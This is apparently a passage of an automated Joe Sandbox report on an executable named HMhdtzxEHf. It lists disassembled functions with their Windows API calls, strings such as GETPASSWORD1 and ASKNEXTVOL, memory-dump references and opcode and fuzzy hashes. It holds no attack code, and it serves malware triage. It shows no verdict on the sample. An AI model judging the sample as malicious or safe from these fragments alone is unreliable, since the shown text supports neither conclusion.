                                                                                            • Instruction Fuzzy Hash: 4031E3B1E04248AADF21EFA4DD45FFEBBB8BF45300F048015F845A7282CB748A85CB61
                                                                                            Function 00A4AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4AD98
                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A4ADAD
                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A4ADC2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemText$DialogWindow
                                                                                            • String ID: ASKNEXTVOL
                                                                                            • API String ID: 445417207-3402441367
                                                                                            • Opcode ID: 43a96481558cd6e265451b70ba65b1016cd2c622969c322912043ce2cbc096cc
                                                                                            • Instruction ID: aff070ea0c081bb39de99f50a259df7050280f057d964911900216df2cc28857
                                                                                            • Opcode Fuzzy Hash: 43a96481558cd6e265451b70ba65b1016cd2c622969c322912043ce2cbc096cc
                                                                                            • Instruction Fuzzy Hash: 9E11C836BC0200BFE711DFA9DD45FAA7B79EFAA742F000511F241EB4A0CB619906D722
                                                                                            Function 00A3D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __fprintf_l.LIBCMT ref: 00A3D954
                                                                                            • _strncpy.LIBCMT ref: 00A3D99A
                                                                                              • Part of subcall function 00A41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A71030,00000200,00A3D928,00000000,?,00000050,00A71030), ref: 00A41DC4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                            • String ID: $%s$@%s
                                                                                            • API String ID: 562999700-834177443
                                                                                            • Opcode ID: 95423eef971a7c0f8e4ff58a4388a8e9514c2498a8252031bb982a3be6b76b27
                                                                                            • Instruction ID: d746ef74ac9f0c483138f53292be9b219ccf59532f1eceacce118650645329ae
                                                                                            • Opcode Fuzzy Hash: 95423eef971a7c0f8e4ff58a4388a8e9514c2498a8252031bb982a3be6b76b27
                                                                                            • Instruction Fuzzy Hash: 78219A72840248EEEF21EFA4DD02FEE7BB8AF15300F040562FA10965A2E272D6499F51
                                                                                            Function 00A40E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A3AC5A,00000008,?,00000000,?,00A3D22D,?,00000000), ref: 00A40E85
                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A3AC5A,00000008,?,00000000,?,00A3D22D,?,00000000), ref: 00A40E8F
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A3AC5A,00000008,?,00000000,?,00A3D22D,?,00000000), ref: 00A40E9F
                                                                                            Strings
                                                                                            • Thread pool initialization failed., xrefs: 00A40EB7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                            • String ID: Thread pool initialization failed.
                                                                                            • API String ID: 3340455307-2182114853
                                                                                            • Opcode ID: 2b7c4f37748291b31e9825a3b7e36baff16326425a22f0414870d0038e570114
                                                                                            • Instruction ID: 1f15a51ddcf26aed10f9f6eb12a74751f4d278688251833baabf1f549097e027
                                                                                            • Opcode Fuzzy Hash: 2b7c4f37748291b31e9825a3b7e36baff16326425a22f0414870d0038e570114
                                                                                            • Instruction Fuzzy Hash: C111A3B2600708AFC3219F7A9C859A7FBECEB99744F108C2EF1DAC3200D6B559519B50
                                                                                            Function 00A4B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • EndDialog.USER32(?,00000001), ref: 00A4B2BE
                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00A4B2D6
                                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A4B304
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemText$DialogWindow
                                                                                            • String ID: GETPASSWORD1
                                                                                            • API String ID: 445417207-3292211884
                                                                                            • Opcode ID: bffd0b010bcb5e3bc9387f25389ebce8972c344ed2fea273072af4717c21fadd
                                                                                            • Instruction ID: 61dd0084a4cc16a7366109332bf314344c66773ccf49fd30bc0a2c557353b517
                                                                                            • Opcode Fuzzy Hash: bffd0b010bcb5e3bc9387f25389ebce8972c344ed2fea273072af4717c21fadd
                                                                                            • Instruction Fuzzy Hash: CC11E136A10118BADF219FA49D49FFF377CEB89740F100021FA45B6084C7A0EA019771
                                                                                            Function 00A4DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                            • API String ID: 0-56093855
                                                                                            • Opcode ID: 6ac178a723e1b2c4f56af650f78d173f7ff626843d613eca6c06d57c6448237a
                                                                                            • Instruction ID: bd50e7a6b1723230e65a84740c09a750ab9e0b4af4147caa52e3b8c1395671b3
                                                                                            • Opcode Fuzzy Hash: 6ac178a723e1b2c4f56af650f78d173f7ff626843d613eca6c06d57c6448237a
                                                                                            • Instruction Fuzzy Hash: 2901B17AE05245AFCB11CFE8FC0895A7BB8FB89354B004436F809C3230C7708892DBA0
                                                                                            Function 00A59A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: __alldvrm$_strrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1036877536-0
                                                                                            • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                            • Instruction ID: 0f28ac73749d30141b6ca684ca72cd901d91e2f9e5bb1548a9cd56a61ef89b5c
                                                                                            • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                            • Instruction Fuzzy Hash: E7A11272A04786DFEB21CF28C9917AFBBE5FF55311F28416DE9859F282C2388949C750
                                                                                            Function 00A3A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00A37F69,?,?,?), ref: 00A3A3FA
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00A37F69,?), ref: 00A3A43E
                                                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00A37F69,?,?,?,?,?,?,?), ref: 00A3A4BF
                                                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,00A37F69,?,?,?,?,?,?,?,?,?,?), ref: 00A3A4C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Create$CloseHandleTime
                                                                                            • String ID:
                                                                                            • API String ID: 2287278272-0
                                                                                            • Opcode ID: 593feb6c086a3757429c4b34f414bb5f2899a58e732d54fce1bf8877def77c86
                                                                                            • Instruction ID: 590ffb71f812c76e7d0c3c705dc0e60a1d80de81b79d42297e5705d582ece6f6
                                                                                            • Opcode Fuzzy Hash: 593feb6c086a3757429c4b34f414bb5f2899a58e732d54fce1bf8877def77c86
                                                                                            • Instruction Fuzzy Hash: 4941FD31288391AAE721DF24DC45FAEBBE8AFA0300F04091CF5E097180C6A4AA4CDB53
                                                                                            Function 00A31100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 176396367-0
                                                                                            • Opcode ID: 34b36bb1343aa5a99964eff089a23077553e84dd0cdde6b0d3ad0688b04e2289
                                                                                            • Instruction ID: ca7395c4ee9c85b8d91c78557b43ff6b83d691bd4dfc24a79fc7e3c6ad5484ea
                                                                                            • Opcode Fuzzy Hash: 34b36bb1343aa5a99964eff089a23077553e84dd0cdde6b0d3ad0688b04e2289
                                                                                            • Instruction Fuzzy Hash: FC41DA71A006655BCB11DFA88D0A9DFBBB8EF40311F00002AFD46F7245DF34AE498BA4
                                                                                            Function 00A5C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00A591E0,?,00000000,?,00000001,?,?,00000001,00A591E0,?), ref: 00A5C9D5
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A5CA5E
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A56CBE,?), ref: 00A5CA70
                                                                                            • __freea.LIBCMT ref: 00A5CA79
                                                                                              • Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                            • String ID:
                                                                                            • API String ID: 2652629310-0
                                                                                            • Opcode ID: 5b341706931a2c86f33e1f502de331083118974bbc347be64f0394f4eaa39ea8
                                                                                            • Instruction ID: 44e567c06a211345c8d367c45e24700bab55c958c3c79f3c58adecf9d1d26f3c
                                                                                            • Opcode Fuzzy Hash: 5b341706931a2c86f33e1f502de331083118974bbc347be64f0394f4eaa39ea8
                                                                                            • Instruction Fuzzy Hash: 0331CD32A0021AAFDF24CF64DC41EAE7BA6FB41361B044228FD04E7255EB35DD59CBA0
                                                                                            Function 00A4A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 00A4A666
                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A4A675
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A4A683
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00A4A691
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDevice$Release
                                                                                            • String ID:
                                                                                            • API String ID: 1035833867-0
                                                                                            • Opcode ID: 7713e6303daca65237eb9db5f792d93aade65603b6c377ba856265e2bc14db21
                                                                                            • Instruction ID: ea5e1fe6d66ea4fc36bf8c5f316dcf17910b79abbd4549be3e86987ca944ba21
                                                                                            • Opcode Fuzzy Hash: 7713e6303daca65237eb9db5f792d93aade65603b6c377ba856265e2bc14db21
                                                                                            • Instruction Fuzzy Hash: 03E01D36A92731B7D751DBE47C0DB8F3E78AB15B52F014102F605A51D0DF7845428B91
                                                                                            Function 00A4A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A4A699: GetDC.USER32(00000000), ref: 00A4A69D
                                                                                              • Part of subcall function 00A4A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A4A6A8
                                                                                              • Part of subcall function 00A4A699: ReleaseDC.USER32(00000000,00000000), ref: 00A4A6B3
                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00A4A83C
                                                                                              • Part of subcall function 00A4AAC9: GetDC.USER32(00000000), ref: 00A4AAD2
                                                                                              • Part of subcall function 00A4AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00A4AB01
                                                                                              • Part of subcall function 00A4AAC9: ReleaseDC.USER32(00000000,?), ref: 00A4AB99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectRelease$CapsDevice
                                                                                            • String ID: (
                                                                                            • API String ID: 1061551593-3887548279
                                                                                            • Opcode ID: 439fb5433146d2429ae65336723ef9783c183e348f9961d4e1ff844cccc7cd7b
                                                                                            • Instruction ID: 1a38d40b0b4776d1628407d38ca4ceeb9ed4b7ed94803db6c1c10b1116aaddff
                                                                                            • Opcode Fuzzy Hash: 439fb5433146d2429ae65336723ef9783c183e348f9961d4e1ff844cccc7cd7b
                                                                                            • Instruction Fuzzy Hash: 9A91E0B5608354AFDA11DF65C854A6BBBF8FFD8700F00491EF59AD3260DB70A906CB62
                                                                                            Function 00A375DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A375E3
                                                                                              • Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0
                                                                                              • Part of subcall function 00A3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A3A598
                                                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A3777F
                                                                                              • Part of subcall function 00A3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A501
                                                                                              • Part of subcall function 00A3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A532
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                            • String ID: :
                                                                                            • API String ID: 3226429890-336475711
                                                                                            • Opcode ID: 6c815442fef50947b6e459777b2a9ba6d6786e1005daeef7d995fc2ac9913588
                                                                                            • Instruction ID: d52c4a3cc45da84674db12192ff21fd50a13c1c95f509cff9b7d7e5e35da05b0
                                                                                            • Opcode Fuzzy Hash: 6c815442fef50947b6e459777b2a9ba6d6786e1005daeef7d995fc2ac9913588
                                                                                            • Instruction Fuzzy Hash: AD4161B1805158AAEB35EB64CD56EEEB37CEF55300F008096B649A2092DB745F89CF61
                                                                                            Function 00A4B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: }
                                                                                            • API String ID: 176396367-4239843852
                                                                                            • Opcode ID: 5fff244215bb0250d572cca17bf2e53e77aae3f368b738885c457160ce608fe2
                                                                                            • Instruction ID: d4512ac8e0456a6a1e129f6758bfe1ac8b9b99e3bb4f5e81b1204fd52d729c63
                                                                                            • Opcode Fuzzy Hash: 5fff244215bb0250d572cca17bf2e53e77aae3f368b738885c457160ce608fe2
                                                                                            • Instruction Fuzzy Hash: 5121DE7692430A5ADB31EB68D945A6AB3ECEFD0751F04042AFA41C3141EB75ED4883B3
                                                                                            Function 00A3F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A3F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A3F2E4
                                                                                              • Part of subcall function 00A3F2C5: GetProcAddress.KERNEL32(00A781C8,CryptUnprotectMemory), ref: 00A3F2F4
                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00A3F33E), ref: 00A3F3D2
                                                                                            Strings
                                                                                            • CryptProtectMemory failed, xrefs: 00A3F389
                                                                                            • CryptUnprotectMemory failed, xrefs: 00A3F3CA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
